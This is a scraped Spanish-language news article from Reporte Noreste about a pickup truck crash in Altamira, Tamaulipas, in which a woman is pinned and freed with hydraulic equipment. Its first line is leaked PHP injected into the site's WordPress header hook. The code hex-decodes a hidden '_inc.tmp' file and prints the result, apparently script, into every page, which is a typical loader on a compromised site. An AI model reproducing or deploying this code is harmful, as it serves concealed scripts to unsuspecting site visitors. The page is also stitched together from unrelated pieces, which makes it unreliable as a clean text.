if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Mujer prensada dentro de una camioneta en accidente vehicular – Reporte Noreste
Conéctate con nosotros

Sur de Tamaulipas

Mujer prensada dentro de una camioneta en accidente vehicular

Mujer prensada dentro de una camioneta en accidente vehicular

Altamira, Tamaulipas.- Una mujer quedó prensada en el asiento de copiloto de una camioneta pick up, al sufrir un accidente vehicular cuando circulaba a exceso de velocidad por el bulevar Primex, con rumbo al centro de Altamira.

El accidente ocurrió poco antes de las 9 de la mañana de este día en el citado lugar a la altura de la entrada al viejo basurero municipal.

El accidente ocurrió al parecer cuando el conductor de la unidad circulaba por el carril derecho y al pasar sobre lodo, perdió el control de la camioneta y se fue directo al camellón, estrellándose de costado derecho contra un árbol.

Esto provocó que la mujer que le acompañaba quedara prensada en los fierros retorcidos, siendo necesario el equipo hidráulico para romper y extraer a la lesionada, siendo trasladada junto con el conductor a un hospital de la localidad.

Inició carrera en medios en 1996. Ha participado como reportero en medios impresos y electrónicos conductor de noticias en radio y televisión.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Sur de Tamaulipas